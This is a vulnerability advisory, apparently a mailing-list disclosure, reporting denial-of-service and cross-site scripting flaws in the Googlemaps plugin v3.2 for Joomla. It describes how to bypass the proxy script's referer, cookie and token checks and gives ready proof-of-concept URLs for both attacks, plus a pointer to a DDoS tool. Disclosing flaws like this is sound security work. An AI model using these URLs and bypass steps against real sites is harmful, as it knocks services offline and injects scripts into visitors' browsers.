DoS and XSS vulnerabilities in Googlemaps plugin for Joomla


Hello 3APA3A! Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for Joomla (http://securityvulns.ru/docs29645.html). After my informing, the developer fixed these vulnerabilities in versions 2.19 and 3.1 of the plugin - by removing proxy functionality. And in version 3.2 of the plugin he introduced new proxy functionality, which must be protected against previous attacks. But after my checking, I've found two holes in the last version of the plugin. These are Denial of Service and Cross-Site Scripting vulnerabilities in Googlemaps plugin for Joomla. ------------------------- Affected products: ------------------------- Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer about these holes. Now he is working on a new version. ------------------------- Affected vendors: ------------------------- Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 ---------- Details: ---------- To bypass protection for accessing this script it's needed to set referer, cookie and token. The referer is current site, the cookie is set by the site (Joomla) itself and the token can be found at page which uses plugin of the site (and it's setting in URL). This data can be taken from the site automatically. Referer: http://site Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0 Denial of Service (WASC-10): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1 Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html). Cross-Site Scripting (WASC-08): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1 Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua